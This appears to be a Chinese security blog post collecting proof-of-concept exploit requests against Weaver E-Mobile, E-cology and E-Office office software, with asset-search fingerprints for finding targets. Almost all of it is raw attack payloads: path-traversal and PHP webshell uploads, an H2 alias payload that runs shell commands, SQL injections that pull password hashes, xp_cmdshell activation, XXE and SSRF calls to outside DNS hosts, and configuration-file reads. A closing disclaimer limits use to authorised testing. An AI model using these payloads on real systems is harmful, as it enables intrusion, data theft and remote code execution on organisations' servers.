unsetunset泛微E-Mobile系列unsetunset
E-mobile lang2sql接口任意文件上传漏洞
title="移动管理平台-企业管理"
POST /emp/lang2sql?client_type=1&lang_tag=1 HTTP/1.1
Content-Type: multipart/form-data;boundary=----WebKitFormBoundarymVk33liI64J7GQaK
Content-Length: 226
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="file";filename="../../../../appsvr/tomcat/webapps/ROOT/Check.txt"
This site has a vulnerability !!!
------WebKitFormBoundarymVk33liI64J7GQaK--
访问{host}/Check.txt即可
e-mobile_upload_save 任意文件上传漏洞
body="/newplugins/js/pnotify/jquery.pnotify.default.css"
POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Length: 350
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="upload_quwan"; filename="1.php."
Content-Type: image/jpeg
<?php phpinfo();?>
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
访问回显中的/attachment/xxxxxx/1.php即可
E-Mobile 6.0 命令执行漏洞
fofa:app="泛微-EMobile"
POST /client.do HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvVPZWWKFq310ISXS
Content-Length: 1125
------WebKitFormBoundaryvVPZWWKFq310ISXS
Content-Disposition: form-data; name="method"
getupload
------WebKitFormBoundaryvVPZWWKFq310ISXS
Content-Disposition: form-data; name="uploadID"
1';CREATE ALIAS if not exists abcd AS CONCAT('void e(String cmd) throws java.la','ng.Exception{','Object curren','tRequest = Thre','ad.currentT','hread().getConte','xtClass','Loader().loadC','lass("com.caucho.server.dispatch.ServletInvocation").getMet','hod("getContextRequest").inv','oke(null);java.la','ng.reflect.Field _responseF = currentRequest.getCl','ass().getSuperc','lass().getDeclar','edField("_response");_responseF.setAcce','ssible(true);Object response = _responseF.get(currentRequest);java.la','ng.reflect.Method getWriterM = response.getCl','ass().getMethod("getWriter");java.i','o.Writer writer = (java.i','o.Writer)getWriterM.inv','oke(response);java.ut','il.Scan','ner scan','ner = (new java.util.Scann','er(Runt','ime.getRunt','ime().ex','ec(cmd).getInput','Stream())).useDelimiter("\\A");writer.write(scan','ner.hasNext()?sca','nner.next():"");}');CALL abcd('whoami');--
------WebKitFormBoundaryvVPZWWKFq310ISXS--
unsetunset泛微E-cology系列unsetunset
e-cology getFileViewUrl接口存在SSRF漏洞
POST /api/doc/mobile/fileview/getFileViewUrl HTTP/1.1
Content-Type: application/json
Content-Length: 110
{
"file_id": "1000",
"file_name": "c",
"download_url":"http://xxxx.dnslog.cn"
}
!e-cology WorkflowServiceXml SQL注入漏洞
app="泛微-OA(e-cology)"
POST /services%20/WorkflowServiceXml HTTP/1.1
Content-Length: 422
Content-Type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservices.workflow.weaver">
<soapenv:Header/>
<soapenv:Body>
<web:getHendledWorkflowRequestList>
<web:in0>1</web:in0>
<web:in1>1</web:in1>
<web:in2>1</web:in2>
<web:in3>1</web:in3>
<web:in4>
<web:string>1=1 AND 2=2</web:string>
</web:in4>
</web:getHendledWorkflowRequestList>
</soapenv:Body>
</soapenv:Envelope>
返回包有requestName和workflowTypeName即可
e-cology getE9DevelopAllNameValue2任意文件读取漏洞
GET /api/portalTsLogin/utils/getE9DevelopAllNameValue2?fileName=portaldev_%2f%2e%2e%2fweaver%2eproperties HTTP/1.1
e-Weaver SQL注入
GET /Api/portal/elementEcodeAddon/getSqlData?sql=select%20@@version HTTP/1.1
e-cology前台接口SQL注入漏洞
POST /mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333 HTTP/1.1
formids=11111111111)))%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion select NULL,value from v$parameter order by (((1
E-Cology9 browser.jsp SQL注入漏洞(CNVD-2023-12632)
POST /mobile/%20/plugin/browser.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 2437
isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%36%25%33%31%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%38%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%30%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%37%25%32%35%25%33%36%25%36%36%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%33%36%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%33%38%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%36%34%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%36%36%25%32%35%25%33%37%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%33%37%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%37%25%32%35%25%33%36%25%33%38%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%33%37%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%33%34%25%32%35%25%33%33%25%36%34%25%32%35%25%33%32%25%33%37%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%39%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%33%34%25%32%35%25%33%36%25%36%34%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%37
e-cology 前台SQL注入漏洞
app.name="泛微 e-cology 9.0 OA"
POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
fileid=1+WAITFOR+DELAY+%270:0:2%27&isFromOutImg=1
E-cology XML外部实体注入漏洞
POST /rest/ofs/deleteUserRequestInfoByXml HTTP/1.1
Content-Type: application/xml
<a><syscode>1</syscode></a>
POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1
Content-Type: application/xml
POST /rest/ofs/deleteUserRequestInfoByXml HTTP/1.1
Content-Length: 35
Content-Type: application/xml
<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY % d SYSTEM "http://wutvavcfzj.dnstunnel.run">
%d;
]>
<a>&xxe;</a>
e-cology ofsLogin任意用户登录漏洞
/mobile/plugin/1/ofsLogin.jsp?gopage=/wui/index.html&loginTokenFromThird=866fb3887a60239fc112354ee7ffc168&receiver=1&syscode=1×tamp
e-cology CheckServer.jsp SQL注入
/mobile/plugin/CheckServer.jsp?type=mobileSetting
!E-Cology WorkPlanService 未授权 SQL注入
POST /services/WorkPlanService
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.workplan.weaver.com.cn"> <soapenv:Header/> <soapenv:Body> <web:deleteWorkPlan> <!--type: string--> <web:in0></web:in0> <!--type: int--> <web:in1>22</web:in1> </web:deleteWorkPlan> </soapenv:Body> </soapenv:Envelope>
//延迟大于2.5
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.workplan.weaver.com.cn"> <soapenv:Header/> <soapenv:Body> <web:deleteWorkPlan> <!--type: string--> <web:in0>(SELECT 8544 FROM (SELECT(SLEEP(3-(IF(27=27,0,5)))))NZeo)</web:in0> <!--type: int--> <web:in1>22</web:in1> </web:deleteWorkPlan> </soapenv:Body> </soapenv:Envelope>
//延迟小于3.5
ECology ifNewsCheckOutByCurrentUser.dwr 未授权 SQL注入
POST /dwr/call/plaincall/CptDwrUtil.ifNewsCheckOutByCurrentUser.dwr HTTP/1.1
Content-Length: 189
Content-Type: text/plain
callCount=1
page=
httpSessionId=
scriptSessionId=
c0-scriptName=DocDwrUtil
c0-methodName=ifNewsCheckOutByCurrentUser
c0-id=0
c0-param0=string:1 WAITFOR DELAY '0:0:3'
c0-param1=string:1
batchId=0
ECology Download.jsp 未授权 路径遍历漏洞
{host} + "/mobile/plugin/Download.jsp?sessionkey=1/mobile/plugin/Download.jsp?sessionkey=1%27%20EXEC%20sp_configure%20%27show%20advanced%20options%27,1%20RECONFIGURE%20EXEC%20sp_configure%20%27xp_cmdshell%27,1%20RECONFIGURE%20exec%20master..xp_cmdshell%20%27ping+{dns_host}"
E-Cology-KtreeUploadAction任意文件上传漏洞
POST /weaver/com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction?action=image HTTP/1.1
Content-Length: 160
Content-Type: multipart/form-data; boundary=--------1638451160
Cookie: Secure; JSESSIONID=abc6xLBV7S2jvgm3CB50w; Secure; testBanCookie=test
----------1638451160
Content-Disposition: form-data; name="test"; filename="test.txt"
Content-Type: application/octet-stream
test
----------1638451160--
E-Cology FileDownload文件读取漏洞
GET /weaver/ln.FileDownload?fpath=../ecology/WEB-INF/prop/weaver.properties HTTP/1.1
E-Cology ResourceServlet文件读取漏洞
GET /weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/prop/weaver.properties HTTP/1.1
E-Cology ProcessOverRequestByXml文件读取漏洞
POST /rest/ofs/ProcessOverRequestByXml HTTP/1.1
Content-Length: 146
Content-Type: application/xml
<?xml version="1.0" encoding="utf-8" ?><!DOCTYPE test[<!ENTITY test SYSTEM "file:///c:/windows/win.ini">]><reset><syscode>&test;</syscode></reset>
E-Cology Getdata SQL注入漏洞
GET /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager HTTP/1.1
E-Cology LoginSSO SQL注入漏洞
GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20password%20as%20id%20from%20HrmResourceManager HTTP/1.1
E-Cology SyncUserInfo SQL注入漏洞
GET /mobile/plugin/SyncUserInfo.jsp?userIdentifiers=-1)union(select(3),null,null,null,null,null,str(3333*3333),null HTTP/1.1
unsetunset泛微E-Office系列unsetunset
E-Office文件上传漏洞(CVE-2023-2523)
app="泛微-EOffice"
POST/Emobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1
Content-Type:multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Accept-Encoding:gzip, deflate
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition:form-data; name="upload_quwan"; filename="1.php."
Content-Type:image/jpeg
<?phpphpinfo();?>
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition:form-data; name="file"; filename=""
Content-Type:application/octet-stream
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--
E-Office 任意文件下载
/general/file_folder/file_new/neworedit/download.php?filename=hosts&dir=C:\Windows\System32\drivers\etc\
E-Office信息泄露漏洞(CVE-2023-2766)
GET /building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini HTTP/1.1
GET /building/config/config.ini HTTP/1.1
E-Office文件上传漏洞(CVE-2023-2648)
POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
Content-Length: 491
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
Content-Disposition: form-data; name="Filedata"; filename="666.php"
Content-Type: application/octet-stream
<?php phpinfo();?>
--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--
--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream
--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--
访问{host}/attachment/返回数字/666.php
E-Office UserSelect未授权访问漏洞
GET /UserSelect/ HTTP/1.1
Content-Type: application/josn
E-Office mysql_config.ini 数据库信息泄漏漏洞
GET /mysql_config.ini HTTP/1.1
Content-Type: application/josn
!E-office10 leave_record.php 未授权 SQL注入
body="eoffice10"&&body="eoffice_loading_tip"
http://xx.xx.xx.xx/eoffice10/client/web/login //首页
http://xx.xx.xx.xx/eoffice10/version.json //版本
{host} + /eoffice10/server/ext/system_support/leave_record.php?flow_id=1%27+AND+%28SELECT+4196+FROM+%28SELECT%28SLEEP%2810%29%29%29LWzs%29+AND+%27zfNf%27%3D%27zfNf&run_id=1&table_field=1&table_field_name=user()&max_rows=10
延迟10秒即执行成功 sqlmap注入run_id时需要设置--prefix="') " --suffix="%23" -p run_id
,注入table_field时直接*
即可
EOffice XmlRpcServlet 任意文件读取
POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1
Content-Type: text/xml;charset=UTF-8
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>WorkflowService.getAttachment</methodName>
<params>
<param>
<value><string>c://windows/win.ini</string></value>
</param>
</params>
</methodCall>
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>WorkflowService.LoadTemplateProp</methodName>
<params>
<param>
<value><string>weaver</string></value>
</param>
</params>
</methodCall>
EOffice 未授权 文件包含漏洞
POST /general/charge/charge_list/do_excel.php
html=<?php+echo+md5('123');unlink(__FILE__);?>
GET /general/charge/charge_list/excel.php 验证md5
EOffice UploadFile.php 未授权 文件上传限制不当
POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId=
Content-Type: multipart/form-data; boundary=f644df16c554bbc109cecef6451c26a4
--f644df16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="test.txt"
Content-Type: image/jpeg
srctest20211129
--f644df16c554bbc109cecef6451c26a4--
访问{host} + /images/logo/ + response.text,显示srctest20211129即存在
e-office sql注入漏洞
POST /building/json_common.php
tfs=city` where cityId=-1 /*!50000union*/ /*!50000select*/1,2,version(),4#|2|333
公众号技术文章仅供诸位网络安全工程师对自己所管辖的网站、服务器、网络进行检测或维护时参考用,公众号的检测工具、脚本仅供各大安全公司的安全测试员安全测试使用。未经允许请勿利用文章里的技术资料对任何外部计算机系统进行入侵攻击,公众号的各类工具、脚本均不得用于任何非授权形式的安全测试。
公众号仅提供技术交流,不对任何成员利用技术文章或者检测工具造成任何理论上的或实际上的损失承担责任。
